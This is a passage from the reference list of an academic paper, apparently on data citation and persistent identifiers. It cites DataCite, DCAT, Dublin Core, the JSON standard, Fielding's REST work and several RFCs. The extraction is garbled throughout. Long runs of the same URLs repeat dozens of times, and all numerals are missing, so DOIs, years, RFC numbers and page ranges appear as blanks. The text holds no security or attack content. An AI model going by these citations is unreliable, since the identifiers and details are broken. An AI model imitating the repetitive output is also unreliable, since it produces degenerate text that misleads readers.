http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://dx.doi.org/ . /peerj-cs. ecma. . ecma- : the json data interchange format. available at http://www. ecma-international.org/publications/files/ecma-st/ecma- .pdf. editors. . credit where credit is due. nature ( ): doi . / a. fielding rt. . architectural styles and the design of network-based software architectures. doctoral dissertation, university of california at irvine. available at https://www.ics.uci.edu/∼ fielding/pubs/dissertation/top.htm. fielding rt, taylor rn. . principled design of the modern web architecture. acm transactions on internet technology ( ): – doi . / . . gao s, sperberg-mcqueen cm, thompson hs. . w c xml schema definition language (xsd) . part : structures: w c recommendation april . available at http://www.w . org/tr/xmlschema - /. github guides. . making your code citable. available at https://guides.github.com/activities/ citable-code/. goodman a, pepe a, blocker aw, borgman cl, cranmer k, crosas m, di stefano r, gil y, groth p, hedstrom m, hogg dw, kashyap v, mahabal a, siemiginowska a, slavkovic a. . ten simple rules for the care and feeding of scientific data. plos computational biology ( ):e doi . /journal.pcbi. . gray a, dumontier m, marshall m, baram j, ansell p, bader g, bando a, callahan a, cruz-toledo j, gombocz e, gonzalez-beltran a, groth p, haendel m, ito m, jupp s, katayama t, krishnaswami k, lin s, mungall c, le novere n, laibe c, juty n, malone j, rietveld l. . data catalog vocabulary (dcat): w c recommendation january . available at http://www.w .org/ /sw/hcls/notes/hcls-dataset/. greenberg sa. . how citation distortions create unfounded authority: analysis of a citation network. bmj :b doi . /bmj.b . gudgin m, hadley m, mendelsohn n, moreau j-j, nielsen hf, karmarkar a, lafon y. . soap version . part : messaging framework (second edition): w c recommendation april . available at http://www.w .org/tr/soap -part /. haas h, brown a. . web services glossary: w c working group note february . available at http://www.w .org/tr/ /note-ws-gloss- /#webservice. hakala j. . rfc : using national bibliography numbers as uniform resource names. available at https://tools.ietf.org/html/rfc . hilse h-w, kothe j. . implementing persistent identifiers. available at http://xml.coverpages. org/ecpa-persistentidentifiers.pdf. holtzman k, mutz a. . rfc : transparent content negotiation in http. available at https://www.ietf.org/rfc/rfc .txt. hourclé j, chang w, linares f, palanisamy g, wilson b. . linking articles to data. in: rd asis&t summit on research data access & preservation (rdap) new orleans, la, usa. available at http://vso .nascom.nasa.gov/rdap/rdap landingpages handout.pdf. international doi foundation. . doi handbook. available at http://www.doi.org/hb.html. ioannidis jpa. . why most published research findings are false. plos medicine ( ):e doi . /journal.pmed. . iso/tc . . iso - : : geographic information metadata, part : fundamentals. available at http://www.iso.org/iso/home/store/catalogue tc/catalogue detail.htm? csnumber= . jacobs i, walsh n. . architecture of the world wide web, volume one w c recommendation december . available at http://www.w .org/tr/webarch/#identification. starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://www.ecma-international.org/publications/files/ecma-st/ecma- .pdf http://dx.doi.org/ . / a https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm 